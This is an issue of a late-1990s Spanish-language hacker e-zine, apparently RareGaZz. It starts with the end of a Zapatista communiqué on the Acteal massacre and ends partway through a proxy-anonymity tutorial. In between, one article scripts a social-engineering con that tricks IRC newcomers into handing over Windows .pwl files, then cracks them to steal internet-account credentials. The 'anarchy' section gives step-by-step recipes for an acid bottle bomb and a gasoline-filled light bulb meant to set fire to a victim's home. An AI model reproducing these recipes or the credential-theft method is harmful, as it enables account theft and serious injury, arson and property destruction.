Publica del estado de Chiapas respaldaron la agresion y, en horas de la tarde y noche, se dedicaron a recoger cadaveres para ocultar la magnitud de la matanza. Los señores Homero Tovilla Cristiani y Uriel Jarquin (Secretario y Subsecretario del Gobierno de Chiapas respectivamente), comisionaron a la policia para respaldar este crimen. El señor Julio Cesar Ruiz Ferro estuvo continuamente informado del desarrollo del "operativo" (cuando menos desde las 12 horas del dia 22 de diciembre, cuando la matanza llevaba ya una hora). Aprobado por los gobiernos federal y estatal, el ataque se afino el dia 21 de diciembre en una reunion de paramilitares (dirigida por el Señor Jacinto Arias, presidente municipal priista) de las comunidades Los Chorros, Puebla, La Esperanza y Quextic, todas estas del municipio de Chenalho. Cuarto. La responsabilidad directa de estos hechos sangrientos recae en Ernesto Zedillo Ponce de Leon y la Secretaria de Gobernacion, quienes desde hace dos años dieron luz verde al proyecto de contrainsurgencia presentado por el Ejercito federal. Dicho proyecto intenta desplazar la guerra zapatista hacia un conflicto entre indigenas, motivado por diferencias religiosas, politicas o etnicas. Para cumplirlo, se dedicaron a financiar equipo y armamento (mediante fondos de la Secretaria de Desarrollo Social) y a dar entrenamiento militar (dirigido por oficiales del Ejercito federal) a indigenas reclutados por el Partido Revolucionario Institucional. Para dar tiempo a que estos escuadrones de la muerte estuvieran listos, el gobierno federal mexicano diseño una estrategia paralela de dialogo simulado, consistente en llevar una negociacion sin intencion alguna de cumplir lo que se acordara y aumentando la presencia militar en las zonas zapatistas. El gobierno del Estado de Chiapas quedo encargado de garantizar la impunidad de los grupos paramilitares y facilitar su operacion en las principales zonas rebeldes: norte, selva y Altos de Chiapas. Quinto. De esta manera unieron sus fuerzas los gobiernos federal y estatal, el Partido Revolucionario Institucional y el Ejercito federal. Su objetivo esta sintetizado por el "grito de guerra" de los paramilitares llamados "mascara roja": "Vamos a acabar con la semilla zapatista", es decir, "vamos a acabar con las comunidades indigenas". Sexto. Como parte de su estilo de gobierno y muestra de su "voluntad de paz", por diversos canales el señor Ernesto Zedillo mando amenazas a la Comandancia General del EZLN con el siguiente mensaje: "Prefiero pasar a la historia como represor antes que cumplir los acuerdos con el EZLN". Esta palabra si la cumplio. Zedillo ya paso a la historia como asesino de indigenas y lleva en las manos la sangre de Acteal. Septimo. La oportuna atencion de los medios de comunicacion a Chiapas y la justa indignacion de la opinion publica nacional e internacional frente a lo ocurrido, han provocado que los cerebros del crimen se arrebaten la palabra para lavarse las manos y para prometer investigaciones "a fondo". No van a castigar a los responsables, la impunidad esta garantizada porque los que investigan el crimen son los mismos que lo planearon. Por esta razon, las declaraciones del señor Zedillo y de sus subalternos no son mas que demagogia. Octavo. Con motivo de la matanza de Acteal, el gobierno y sus voceros vuelven a llamar al dialogo sin mencionar su determinacion de no cumplir lo ya acordado y solo con el proposito de avanzar en su estrategia contrainsurgente. En este sentido, llama la atencion la reciente y ridicula declaracion de la Cocopa (que decidio irse de vacaciones en lugar de trabajar por la paz) sobre los hechos de Acteal. Olvidan los legisladores que el que esta asesinando niños, mujeres y hombres es el gobierno, olvidan que el que esta haciendo uso de las armas es el gobierno, olvidan que el que se niega a un dialogo serio es el gobierno. Es a el al que deben dirigirse cuando hablen de no recurrir a la violencia y de la necesidad de dialogar. Noveno. Nuevamente el EZLN llama a la sociedad civil nacional e internacional y a las organizaciones independientes para que no se dejen engañar, y para que exijan justicia verdadera y no simulaciones. Decimo. El Comite Clandestino Revolucionario Indigena Comandancia General del EZLN se encuentra en estos momentos completando la investigacion y analizando lo ocurrido para tomar las decisiones necesarias pertinentes. ¡Democracia! ¡Libertad! ¡Justicia! Desde las Montañas del Sureste Mexicano. Comite Clandestino Revolucionario Indigena - Comandancia General del Ejercito Zapatista de Liberacion Nacional. Mexico, Diciembre de 1997. °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ ░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░ ░▒▓█ █▓▒░ ░▒▓█ Como mandar mensajes gratis desde un movil digital █▓▒░ ░▒▓█ █▓▒░ ░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░ Por DreamWeaver Como todos sabeis (o casi todos), los telefonos moviles digitales tienen una opcion que consiste en mandar pequeños mensajes escritos, esta funcion cuesta en España 25 pts/mensaje. El mecanismo de estos mensajes es muy simple, editas un mensaje y pones el numero de la persona a la que quieras mandarselo con una pequeña modificacion ( Si quieres mandar un mensaje al 907 546372, debes poner como numero el +34 07 546372 , todo junto por supuesto) el mensaje llega a una centralita española, te cobra las 25 pts y lo manda al numero que pusiste en el mensaje. Despues de la explicacion pasemos a lo serio ...... En otros paises como son Italia o Sudafrica estos mensajes son gratuitos... no creis que es una injusticia que nos cobren a los españoles 5 duros por llamada???, pues esa injusticia esta solucionada, y de una forma muy simple.. solo teneis que mandar vuestros mensajes a la centralita sudafricana, estas centralitas remitiran vuestro mensaje al numero que especificasteis igual que la centralita española, con una pequeña diferencia economica, no os cobraran NADA. ¿Que? Ah si, se me olvidaba.... Pasos a seguir para cambiar de centralita: 1º Encendeis el movil XD 2º Entrais en las opciones del movil, seleccionais 'Mensajes', subopcion 'Estableciendo mensajes' y su subopcion 'Centro de servicio' 3º Si no os habeis perdido en el paso anterior os aparecera el siguiente numero: +3409090909 , borradlo y poner el de la centralita sudafricana. *NOTA: Estos pasos son en el caso de tener un MoviStar, en el caso del Airtel no deben cambiar mucho. Conclusiones Por supuesto, esto se podra aplicar a otras muchas funciones, dar rienda suelta a vuestra imaginacion y si encontrais algo escribidme... Centralita Sudafricana: +27831000002 DreamWeaver e_mail: weaverdream@hotmail.com °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ ================================= | Free Unix Shell Accounts | |Lista de servidores que ofrecen| |acceso gratuito a un shell unix| ================================= =VoraX= ¿Hace falta explicar la utilidad de una cuenta shell en un sistem unix?. Creo que no por eso sin mas palabras mando la lista. No intenten hackear estos sistemas, ¿para que? si ofrecen un servicio gratis y nos sirven mas como punto de partida para otros hackeos que para hackearlos. =Esta lista fue confeccionada originalmente por godson@usa.net existe otra de exhaust@false.com, pero creo que es copiada de la primera = = Las listas originales las pueden encontrar buscando en su maquina de busqueda favorita "Free Unix Shell Accounts" o "Free shell accounts providers list" =Para obtener una cuenta generalmente deben enviar un mail, pueden hacerlo desde la pagina de cada uno donde van a encontrar los datos que deben enviar= y, se me escaparon algunas palabras :O.... --------------------------------------------------------------------------- ESTOS NO FUNCIONAN MAS: flex.laker.net NO FUNCIONA MAS Linuxbox NO HAY MAS CUENTAS GRATIS Cyber Disaster NO FUNCIONA MAS ----------------------------------------------------------------------------- (1) http://blackbox.thegeek.net/~blackbox/index.html (2) http://www.unixnet.org "Unixnet.org" (3) http://www.cyberspace.org "Grex" (4) http://sdf.lonestar.org (5) http://continuum.dynip.com (6) http://dishboy.dyn.ml.org (7) http://griffin.ni.net "Griffin" (8) http://suburbia.com.au "Suburbia" (9) http://www.wopr.net "Wopr Net" (10) http://www.nyx.net "NYX Net" (MAS DATOS DE CADA UNO ABAJO) De estos no tengo datos porque los saque de otros lugares: http://pod.yeat.ml.org http://free.x-tel.com http://abyss.suid.net ===(1) [Este lo probe, anda bien] Direccion de email:<username>@blackbox.thegeek.net Pagina:http://blackbox.thegeek.net/~<username> http://blackbox.thegeek.net/~blackbox/index.html Email: root@blackbox.thegeek.net Fee: -FREE- , donations encouraged Payment Method: cash, check, money order, hardware donation Possibility to order online: email validation Initial HD space: 5MB (mmm.. en realidad son 3MB) Additional HD space: Donation Internet Connection: T1 Software/service available: ircii, tcl, gcc, ftp, screen, web page, telnet, email account,etc. OS: Redhat Linux 4.2 Computer: 486/33, 8MB RAM, 600MB HD First appeared: 12-15-1997 ==(2) UNIXnet.org http://www.unixnet.org Email: john@piglet.netlite.com (20/12/97) Email: accounts@unixnet.org (2/9/97) Fee: -FREE- .. donations requested. Initial HD space: 5Mb (unregulated!) Additional HD space: on request, case by case basis Internet Connection: T1, 4 hops to backbone Software/service: ircii, tcl, gcc, ncftp, webpage, email OS: Linux Redhat 4.2 Comments: NO bots of any kind unless a donation is made, NO screen. This host is former transient. Last updated 12/20/97. ===(3) Grex http://www.cyberspace.org Email: info-g@cyberspace.org Fee: Voluntary donation Initial HD space: minimal Internet Connection: a tiny 33.6 kbps modem link. Software/service available: PicoSpan and Backtalk, lynx OS: Sun OS 4.1.3 Comments: Grex is a public-access conferencing system, run by its users. It's a tiny advertising-free space on the net where you can find good conversations and a friendly user community. (SI, todo muy lindo pero es mas lento que la mierda y tenes que sacar numero para entrar (literalmente) ===(4) http://sdf.lonestar.org Email: accounts@sdf.lonestar.org Initial HD space: 10-20 MB Additional HD space: donation Internet Connection: ISDN, 2 hops Software/service available: everything you need, bots are welcome to those who contribute. OS: AT&T 3b2 UNIX System Vr3.2.3 Comments: no IRC ! First appeared: 07-09-1997 Last updated: 11-27-1997 ====(5) http://continuum.dynip.com Email: support@continuum.dynip.com Fee: -FREE-, donations encouraged ($5 to run an eggbot) Payment Method: cash, check, money order Possibility to order online: email validation Initial HD space: 5MB Additional HD space: $1 = +1mb Internet Connection: 512kbps cable modem. Software/service available: ircii, tcl, gcc, ncftp, screen, web page, email account etc OS: Slackware Linux 3.4 - Kernel 2.0.31 Computer: P75, 8MB ram, 1.2GB hd First Appeared: 10-22-1997 Last Updated: 11-19-1997 ===(6) http://dishboy.dyn.ml.org Email: jonp@radix.net Fee: -FREE- Possibility to order online: mail jonp@radix.net with desired l/p Initial HD space: 5MB soft / 7MB hard limit Additional HD space: Donating members only Internet Connection: 14.4 Modem to radix.nets DS3 PoP in OxonHill, MD, then to digex/cais Software/service available: irc (EPIC4), gcc/cc, perl, ncftp, web page, email account, majordomo (list server), pub ftp OS: Linux Slackware 3.4, kernel release 2.0.32 Computer: 486DX4/80MHZ, 16megs RAM, 1.2 gig IDE HD Comments: This system needs donations bad!! Donating members have their Quotas removed and may run more intensize processes i.e. bots/ircd's> First appeared: 12-18-1997 ==(7) Griffin http://griffin.ni.net Email: egb@griffin.ni.net Fee: None. (Pending individual approval) Possibility to order online: web page signup form. Initial HD space: 5MB Additional HD space: $1 - 1MB Internet Connection:Cablemodem. 750kbps upstream, 10Mbps downstream. Dialup: n/a Software/service available: web, cgi, email, MUD, BitchX, Lynx etc OS: Slackware Linux 2.0.30 ELF Computer: Griffin (main): P60, 1GB HD, 24MB RAM. red5 (monitoring system): P120, 1GB HD, 8MB RAM. Comments: Shell accounts are free, provided I think you're a nice person. Only, dameons such as IRC bots, MUDs and Talkers, and exessive disk usage are charged for. Last Updated: 10-06-1997 ==(8) Suburbia http://suburbia.com.au Email: info@suburbia.com.au Fee: refer to http://www.suburbia.com.au/join Payment Method: Visa, Mastercard, Bankcard, cheques, etc Possibility to order online: yes Initial HD space: 5MB Additional HD space: unlimited-ish when a sponsor Internet Connection: BRI (64k), 1 hops to backbone Software/service available: ircII, gcc, ncftp, web page, email account, etc OS: Linux Comments: $10/month, unless you live in Sydney Australia, or good reason given. NO IRCBOTS, NO IRCSERVERS. First appeared: 07-28-1997 Last Updated: 12-18-1997 ===(9) wopr.net http://www.wopr.net Email: support@wopr.net Fee: -FREE- (donations accepted) Initial HD space: 4MB Additional HD space: NOT AVALABLE Internet Connection: Dual B ISDN (128k) Software/service available: ircii, tcl, gcc, perl, lots more OS: NetBSD 1.2G Computer: Sparcstation 10 with 320m ram 9.2G hd Supersparc Processor First appeared: 12-12-1997 Last updated: 12-20-1997 ===(10) NYX.net http://www.nyx.net Email(s): aburt@nyx.net Fee: -FREE- Initial HD space: 300Kb Additional HD space: N/A Internet Connection: T1 Software/service : web page, email account, tcl OS: SunOS Comments: You need to be validated to use the system. <need comments from nyx users> Last Updated: 08-26-1997 Envienme comentarios a mi de los servidores que probaron. =VoraX= vrx@bigfoot.com °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ Como conseguir una cuenta con el glide y un poco de ingenieria social. /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\ Primero tenemos que localizar algun canal donde regalen cualquier fichero que les pidamos, esto nomalmente lo encontraremos en canales del tipo : #beginner #iniciacion #novatos #ayuda_novatos etc.. En mi caso (España) vamos a cualquier servidor del irc como minorisa, ergos, ctv, arrakis, redestb o cualquier otro, una vez dentro en el caso de cual- quiera de estos servidores encontraremos el canal #beginer (y algun otro que indican la inexperiencia de los usuarios que alberga), entonces empezaremos las relaciones de ingenieria social, algo como lo siguiente: <Yo> Hola <Novato> Hola <Yo> Como va, dominas esto del irc?? <Novato> Si algo, quieres algo? %%nota: Ahora es el momente para demostrar que somos verdaderamente novatos%% <Yo> Sabes como pegar un texto el irc en el portapapeles?? <Yo> y si no es pedir mucho....como se escribe una letra en color?? %%%%%%%nota: No nos extrañe que el novato no sepa la respuesta a ninguna de las 2 preguntas :-)%%%%% <Novato> Con solo seleccional el texto en la pantalla, ya queda automatica- mente pegado en el portapapeles. <Novato> Pero la segunda pregunta no tengo ni idea. <Yo> Sabes enviar ficheros por aqui?? <Novato> Por supuesto %%Nota: Si no sabe, para nuestro beneficio tendremos que enseñarle :-)%% <Yo> Es que tengo un problema de configuracion con el windows 95 <Yo> y creo que se trata de un fichero que se daño por un virus <Novato> De que fichero se trata?? <Yo> De alguno *.pwl <Novato> Espera <Novato> Si ya lo he encontrado pero tiene mi nombre <Yo> Si se trata del fichero donde el windows guarda la configuracion perso- nalizada <Novato> ah vale <Yo> me lo puedes pasar? <Novato> por supuesto Ya esta!! tenemos el fichero, en ese fichero mucha gente cree que solo hay el login y el passw de acceso a windows95 pero no es asi, tambien reside la in- formacion del conocido MiConexion (del win95) con los datos para el acceso a la cuenta en inet. Como es normal, solo nos falta una cosa un desencriptador, y existen algunos, aunque yo personalmente de momento solo he probado el glide, es un 33% eficaz o sea que desencripta correctamente 1 de cada 3 ficheros, pero creo que vale la pena. Copiaremos el fichero *.pwl el el mismo directorio que el glide, entonces pro- cedemos a la desencriptacion, como podremos comprobar, si escribimos glide, nos indica que para obtener el correcto funcionamiento del desencriptador te- nemos que seguir la siguiente estructura: usage: glide filename (username) Normalmente, segun mi experiencia, el username no tiene porque corresponder con el nombre del fichero, ni tan solo lo debemos poner, asi que si el fichero que nos a pasado el novato se llama barcelona.pwl, bastara con poner: glide barcelona.pwl entonces puede que nos encontremos algo del tipo: Username: barcelona.pwl Sizemask 1FA5 Analyzing block with size 0000 (0:1) Analyzing block with size 0000 (1:0) Analyzing block with size 0034 (2:3) Esto nos lo encontramos en varias lineas hasta que vemos algo parecido a esto: Recource [1] (2) Recource [2] (54) ..............%%Aqui varios lineas parecidas%% Recource [10] (54) [Simbolos raros] *Rna\Mi Conexion\juan@server44567 [Simbolos raros]*Rna Despues sigue alguna linea con recource pero ya esta, ya tenemos lo que anda- bamos buscando ya podemos conectarnos con la cuenta del novatos poniendo lo siguiente: Nombre del usuario:juan@server Contraseña:44567 Por ultimo, vamos a matizar un par o tres de tonterias (por si lo lee algun novatillo), la primera y ya se ha dicho es que el glide funciona 1 de cada 3 casos (posiblemente solo funcione con las versiones antiguas del win95) por ejemplo con el win95 osr2, no funciona. Una segunda, en el glide aparece el nombre de usuario y contraseña del "miconexion" del win95, por lo tanto, no le pidais el fichero a un usuario de linux ;-DD. La ultima aclaracion igual de tonta se trata de la DNS, en configuracion de tcp/ip, en la dns que ponemos?? pues bien solo tenemos que ir a algun buscador como altavista y poner el nombre del servidor en nuestro caso server, os puedo asegurar que un 99% de veces sale, de forma que si sale un link a www.server .com, solo tenemos que conectarnos a el y mirar la ip, o mas facil, con algun portscan que tengamos por ahi. Eso es todo, ahora se tiene otra conexion para inet, incluso cuando se tenga varias cuentas, encontraremos algunas charlas donde podremos intercambiarlas. Este texto ha sido escrito para la revista electronica RareGaZz, como medio informativo, no me hago responsable del mal uso de dicha informacion, asi como daños en los sistemas atacados por dicha cuenta ya que el texto ha sido dise- ñado unicamente con fines educativos y para prevenir dichos ataques. Para cualquier consulta: tatiana76@hotmail.com -TaTiAnA- Vilanva City °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ ANARQUIA...MAS SOBRE EL ARTE DE HERIR COSAS VIVIENTES ////////////////////////////////////////////////////////////////////////////// BOMBA DE ACIDO Materiales: -Una botella grande con tapon (si es de cristal ademas se añade metralla cuando explote :-D) -Acido Clorhidrico (que se puede encontrar en cualquier drogueria a un precio muy barato; en España tambien se le conoce con el nombre de Salfumant o Agua fuerte) -Aluminio; se puede conseguir de las antenas viejas de television (mas efectivo) o del papel ese plateado que sirve para envolver los bocadillos. Construccion: Primero hay que averiguar la concentracion de Acido Clorhidrico, normalmente es del 17%, si es muy alta se debe rebajar un poco con agua porque si no actuara muy rapido y nos explotara en la cara. Con el acido se llena un cuarto de la botella y rapidamente se introduce el aluminio (hay que introducir una buena cantidad si esta en papel, una buena forma es enrollandolo haciendo tiras y meterlo de golpe). una vez dentro hay que tapar rapidamente la botella, lanzarla lo mas lejos posible y a correr!!! Dependiendo de la concentracion del acido este reaccionara mas pronto o mas tarde, pero el acido de dentro se volvera negro y empezara a hervir y a calentarse lanzando gases, si el tapon de la botella ejerce suficiente presion la botella explotara desparramando el acido hirviendo en un radio de al menos cinco metros. No siempre sale una explosion expectacular, primero hay que experimentar con las dosis de acido y aluminio. NOTA: el gas que desprende la reaccion ademas de ser SUPER VENENOSO es inflamable (supongo que es Hidrogeno) por lo que si de alguna manera se consigue encenderlo la explosion gana mucho. ATENCION: esta bomba ademas de ser potente puede producir quemaduras muy graves en la piel y los ojos, asi que si algun incauto me hace caso y lo prueba debe alejarse bastante del artefacto y en caso de no explotar esperar un buen rato antes de acercarse. Mr_Frost ////////////////////////////////////////////////////////////////////////////// EL FOCO BOMBA Ingredientes (o material) : Un foco (de los normales y que sirva) Una jeringa (De la que sea) Azucar (Blanca de preferencia) Gasolina (De la que sea) Un traste de plastico o madera o metalico (Para revolver gasolina y azucar) Una casa (La de la victima) - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ATENCION ATENCION ATENCION ATENCION ATENCION - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Nada mas una cosa, quien vaya a hacer esto tiene que star muy seguro de que lo quiere hacer. Por que quien se va a imaginar que UN FOCO puede VOLAR UNA CASA? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Instruxiones : En el trastesillo, revuelves la gasolina con el azucar (Ai + o - [mas o menos] que quede proporcional la gasolina con el azucar). La metes en la jeringa. Cojes (el foco) y le haces un oyito con la jeringa en la rosca (si puedes, si no con otra cosa) pero NO LA CAGUES!! haslo con CUIDADO, de modo que al ponerlo de vuelta, no se vea el hoyo. Y le hechas la gasolina con azucar (no me acuerdo que tanto, si alguien le cala poniendo el foco muy muy lejos como si fuera a poner dinamita, me dice; no?). Y ya que haga todo eso, naamas se espera a que la victima (lamer) se le ocurra prender la LUZ!!!! y va a tener MUCHA LUMBRE!!!! Trucha. Ai nomas dando lata. /\/\r Z3/\/4/\/. ////////////////////////////////////////////////////////////////////////////// [ Ninguno de estos procedimientos han sido seguidos por ningun miembro de RareGaZz. Por favor no hagan estupideces. Avisen si lo hacen :-) ] °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ ¿Existe la Anonimidad en Internet? La razon principal de este texto es LLEVARTE AL PANICO TOTAL contandote sobre toda la informacion privada que "derrochas" sin darte cuenta. Las lagrimas caen de mis ojos cuando veo tantos inocentes y buenos internautas caer en las garras de corruptos de todos tipos (como Micro$oft) que esconden funciones secretas dentro de sus aplicaciones, o a traves de las maquinas de busqueda que usas todo esto para meterte por la garganta un producto o servicio cualquiera que eventualmente, terminas usando y muchas veces sin necesitarlo. Pero esto termina cuando personas como nosotros nos ponemos del lado de los simples e inocentes usuarios (y dañamos a los corruptos). No anonimidad en la red. Querido internauta, desafortunadamente toda la informacion (y la informacion es poder) que estas derrochando por internet esta siendo recolectada y usada para obtener un perfil exacto de tu persona... esto esta pasando por todo el mundo... Cyber-o-Cracia, como muchos lo llaman, se esta acercando... ellos nos rastrean cada vez que usamos nuestras tarjetas de credito. Cada vez que compras en el supermercado con las llamadas "tarjetas de descuento" (por que crees que nos las entregan y nos piden que las usemos?), cada vez que haces una busqueda en el web, visitas lugares en internet o simplemente mandas un mail a un grupo de noticias o lista de correo. Como he dicho, dejas huellas que pueden ser seguidas por cualquier Sherlock y conseguir tu nombre... de ahi lo demas. Ah! y tu preciosa informacion! Los navegadores mas recientes pueden enviar los archivos de tu PC a la red sin avisarte, archivos que pueden ser utiles a cualquier persona con la intencion de venderte algo. AUTOEXEC.BAT Este archivo contiene detalles de muchas cosas importantes incluyendo la variable PATH que muestra donde estan tus herramientas. SYSTEM.INI Contiene aun mas detalles de los lugares donde tu software esta en tu disco, ademas cosas personales como preferencias, etc. USER.DAT Este monstruo (que actualmente ocupa mas de 2 megas en mi PC) contiene muchisima informacion a cerca de ti. Tu direccion de email, la pagina que se ve cuando prendes tu navegador, tu ultima pagina visitada, los archivos que bajaste de la red y de que tamaño era, etc. SYSTEM.DAT En este archivo se encuentran aun mas detalles sobre tu vida personal, incluyendo tambien los passwords de los salva pantallas, logins, ultimos sitios telnet visitados, en fin, casi cualquier cosa que hayas metido a un programa estara ahi. Todos los programas instalados o que alguna vez instalaste estan registrados. *.PWL Dentro de este archivo estan tus passwords que son facilmente desen- criptados (si es necesario) en cualquier computadora. nsform??.TMP Toda la informacion que metes en esas formas por internet la localizas en estos archivos. SECRING.PGP, Secring.SKR, .ASC, etc. Tu llavero donde esta tu llave secreta y publica, la primera protegida por tu palabra clave (espero hayas escogido una bastante segura:) PERO debes asegurarte que tu maquina no este ejecutando ningun grabador de teclas o que algun virus este captando tus claves. Como buscar cosas en la red anonimamente. Todas las maquinas mantienen un record de tus busquedas y actividades. En el web existen algunos lugares donde puedes obtener las cosas mas buscadas en el web (la mayoria relacionadas con sexo) e incluso desde algunos sitios puedes ver a personas haciendo busquedas en internet (esto es divertido). La importancia de las maquinas de busqueda es muchisima (por eso surgen como hierba mala) y es necesario saber como protegerte de sus mecanismos de rastreo. Debes intentar usar una IP dinamica (asignada cada vez que usas internet) y no una permanente. Tu nombre de host (hostname) y I.P. deben ser lo mas "neutral" y si es posible, sin ninguna nacionalidad. Trucos comunes para capturar personajes anonimos (como nosotros). Un truco comun con el que han tratado de capturar nuestras I.P.'s y procedencias aqui en RareGaZz es el de la "pagina falsa". Este truco consiste en esto principalmente: - Agarras un servidor y le instalas todos los scripts PERL conocidos para rastrear e incluso applets que te envien toda la informacion del visitante a una direccion de email o archivo. - Pones cosas en la pagina que el objetivo necesite mucho. - Escribe al objetivo promocionando la pagina. El objetivo llega a la pagina y PRESTO! lo tienes. Como unicamente el sabe la direccion de la pagina, sera el unico visitante esperado. Moraleja: MANTEN TODA TU INFORMACION SENSITIVA EN EL WEB! DONDE A NADIE SE LE OCURRA ASOMARSE, DIGAMOS QUE TODOS LOS CRACKS QUE HAS HECHO ESTAN DENTRO DE UN GIF DE TU PERRO EN UNA PAGINA CON TITULO "BARKIE Y YO". AHI ESTARA MUCHO MAS SEGURA TU INFORMACION QUE DENTRO DE TU DISCO DURO. °∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙° ∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙°∙ ============================================================================== NAVEGANDO ANONIMAMENTE - SERVIDORES PROXIES by =VoraX= 30/12/97 ============================================================================== I. ¿Que es un proxy server? II. ¿Para que sirve un proxy? III. ¿Como uso un proxy con mi navegador? IV. ¿Que proxies puedo usar? (I) ¿Que es un proxy server? La traduccion de la palabra "proxy" es "apoderado" o "sustituto", es decir una persona que toma la identidad de otra para determinada tarea. Aplicado a la computacion y a Internet un proxy es un servidor que sirve de intermediario entre un cliente y otro servidor. CONEXION NORMAL SIN PROXY (A <-> B) [RESPUESTA] <CLIENTE> <------- <SERVIDOR> (navegador,ftp) ========> (HTTP,FTP,etc) (gopher,etc) [PEDIDO] El cliente (A) que puede ser un navegador, un cliente ftp o de cualquier otra clase se conecta con el puerto correspondiente del servidor (B). CONEXION CON PROXY (A <-> C <-> B) [RESPUESTA] ======= [RESPUESTA] <CLIENTE> <------ | PROXY | <------- <SERVIDOR> (navegador,ftp) =======> | SERVER| =======> (HTTP,FTP,etc) (gopher,etc) [PEDIDO] ======= [PEDIDO] En este caso el cliente (A) se conecta con un puerto especifico del servidor proxy (C), y hace un pedido a otro servidor (B). El proxy C se conecta con B y hace el pedido, luego de recibir la respuesta se la envia al cliente original A. CONEXION CON CACHE PROXY SERVER [RESPUESTA] ======= [RESPUESTA] <CLIENTE> <------ | PROXY | <------- <SERVIDOR> (navegador,ftp) =======> | SERVER| =======> (HTTP,FTP,etc) (gopher,etc) [PEDIDO] ======= [PEDIDO] || \/ [<CACHE>] \-------/ Esta conexion es igual a la anterior con la diferencia de que el servidor proxy tiene un cache (en disco) donde almacena las respuestas a los pedidos de los clientes (A). En una conexion normal cada programa cliente se comunica con el puerto correspondiente en el servidor.Por ejemplo, cuando usamos un navegador, este se contacta (generalmente) con el puerto 80 de la otra computadora. Cuando bajamos una pagina el pedido se hace a ese puerto, y de alli se reciben las respuestas. Cuando usamos el ftp pasa lo mismo pero con un puerto distinto (23) aunque en realidad se usan otros para los datos, pero no es tema de este texto. En cambio, si usamos un proxy el programa cliente se conecta a un puerto en una computadora donde funciona el "Proxy Server" y le hace un pedido de otro servidor en otro puerto pero de un servicio especifico(http-ftp-etc) Por eso existen distintos tipos de proxies de acuerdo al tipo de servicio que soportan, lo que mas frecuentemente encontramos es: "HTTP proxy server" y "FTP proxy server" (II) ¿Para que sirve un proxy? Los proxies tienen muchas utilidades, generalmente funcionan junto con las firewalls, se usan de cache para acelerar la navegacion en LAN's o hasta en ISP, pero el uso que nosotros le vamos a dar es el de ANONIMIZADOR Como vimos antes, si nos conectamos a un servidor X mediante un proxy, nosotros hacemos el pedido al proxy, el proxy lo hace al servidor X y nos envia la respuesta a nosotros. Por lo tanto en X queda registrado que se conecto el proxy y no directamente nosotros. Aunque en los logs del proxy puede figurar nuestra IP y a donde nos conectamos. En definitiva usando proxies ocultamos nuestra IP, y por lo tanto nos ANONIMIZAMOS. (III) ¿Como uso un proxy con mi navegador? Lo que necesitamos para usar un proxy en un programa cliente es configurar su direccion (IP o nombre) y el puerto en el que funciona. Debemos conocer que tipo de servicios soporta el proxy, de acuerdo a esto cambia el puerto en el que funciona, aunque hay muchas excepciones. En algunos programas tenemos casillas para completar la direccion y el puerto de un proxy para cada servicio en otros debemos poner la URL de la forma http://DOMINIO:PUERTO ej: http://Proxy.wasantara.net.id:8080 Los tipos de proxy que soportan muchos navegadores son:HTTP,FTP,GOPHER, WAIS, Security y SOCKS. Los cuatro primeros creo que los conocen porque hasta en el texto mas chico y estupido sobre internet los describe. El Security es para manejar el SSL.SOCKS se usa en las firewalls para controlar el acceso a servicios en Internet, sirve de filtro de las conexiones, permite loguear tan especificamente, permitir o no el acceso a determinados sistemas y muchas otras funciones. COMO CONFIGURAR LOS PROXIES EN LOS NAVEGADORES MAS CONOCIDOS: =Netscape 